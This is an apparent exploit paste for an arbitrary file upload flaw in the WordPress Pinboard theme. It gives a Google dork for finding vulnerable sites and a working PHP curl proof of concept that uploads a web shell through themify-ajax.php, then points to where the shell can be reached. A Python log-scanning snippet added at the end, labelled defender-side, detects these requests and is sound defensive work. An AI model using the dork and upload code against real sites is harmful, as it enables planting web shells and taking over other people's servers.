Exploit Title : WordPress Themes Pinboard Arbitrary File Upl

Googleinurl Nov 26th, 2013 1,169 Never
Exploit Title : WordPress Themes Pinboard Arbitrary File Upload Vulnerability
#Author : ReC0ded
#Vendor : http://themify.me/
#Download : http://themify.me/themes/Pinboard
#Date : 22, November 2013.
#Type : php, html, htm, asp, etc.
#Category : Web Applications
#Vulnerability : File Upload
#Tested On : Windows 7 32-bit | Google Chrome

#Dork : inurl:/wp-content/themes/pinboard/ | USE YOUR BRAIN =))

#Exploit : http://victim/[PATH]/wp-content/themes/pinboard/themify/themify-ajax.php

#POC :

<?php
$uploadfile="ReC0ded.php";
$ch = curl_init("http://victim/[PATH]/wp-content/themes/pinboard/themify/themify-ajax.php?upload=1");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

#Results See Your Shell On : http://victim/[PATH]/wp-content/themes/pinboard/uploads/{YOUR_FILE}.php

#################### Say Yes ####################
$Greetz To : ./Newbie-Security ./Malang Cyber Crew ./Hacker Newbie ./Binus Hacker ./Indonesian Cyber Army ./Indonesian Security Down ./Indonesian Figther Cyber ./Devilzc0de ./Surabaya Blackhat
$Thanks To : ./All Member Newbie-Security Team We Loved ./DevilScreaM ./ShadoWNamE ./grub_err0r ./R3dh34d ./ice-cream ./win32conficker ./HMBP-02 ./Mr.Alf1anz ./casper
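
Defender-side added example (not part of the original paste): a log check for the two request patterns the advisory names, a POST to themify-ajax.php with the upload parameter and a request for a script under the theme's uploads directory. It assumes Combined Log Format; the sample log lines and the scan function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Paths come from the advisory; matching on the path suffix covers the [PATH] prefix.
UPLOAD_ENDPOINT = re.compile(r"/wp-content/themes/pinboard/themify/themify-ajax\.php$", re.I)
UPLOADED_SCRIPT = re.compile(r"/wp-content/themes/pinboard/uploads/[^/]+\.(php\d?|phtml|asp|aspx)$", re.I)
# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample log using documentation IP ranges; not from a real server.
SAMPLE_LOG = """\
198.51.100.7 - - [26/Nov/2013:10:01:02 +0000] "GET /blog/wp-content/themes/pinboard/style.css HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [26/Nov/2013:10:02:11 +0000] "POST /blog/wp-content/themes/pinboard/themify/themify-ajax.php?upload=1 HTTP/1.1" 200 31 "-" "-"
203.0.113.9 - - [26/Nov/2013:10:02:15 +0000] "GET /blog/wp-content/themes/pinboard/uploads/x1.php HTTP/1.1" 200 12 "-" "-"
192.0.2.44 - - [26/Nov/2013:10:05:40 +0000] "GET /blog/wp-content/themes/pinboard/uploads/logo.png HTTP/1.1" 200 804 "-" "Mozilla/5.0"
192.0.2.80 - - [26/Nov/2013:10:07:00 +0000] "GET /blog/wp-content/themes/pinboard/uploads/old.PHP HTTP/1.1" 404 0 "-" "-"
"""

def scan(log_text):
    """Return a list of (severity, ip, timestamp, reason) findings."""
    findings, uploaders = [], set()
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a Combined Log Format line
        url = urlsplit(m["target"])
        ip, ts, status = m["ip"], m["ts"], int(m["status"])
        is_upload = (m["method"] == "POST" and UPLOAD_ENDPOINT.search(url.path)
                     and "upload" in parse_qs(url.query))
        if is_upload:
            uploaders.add(ip)
            findings.append(("medium", ip, ts, "POST to theme upload handler"))
        elif UPLOADED_SCRIPT.search(url.path):
            if status == 200 and ip in uploaders:
                sev = "high"    # same client posted to the handler, then a script was served
            elif status == 200:
                sev = "medium"  # a server-side script is being served from the uploads dir
            else:
                sev = "low"     # request for a script that was not served
            findings.append((sev, ip, ts, "script requested from theme uploads dir"))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="  ")
```

Any "high" or "medium" hit on the uploads directory warrants checking that directory on disk for script files and confirming the web server does not execute scripts from it.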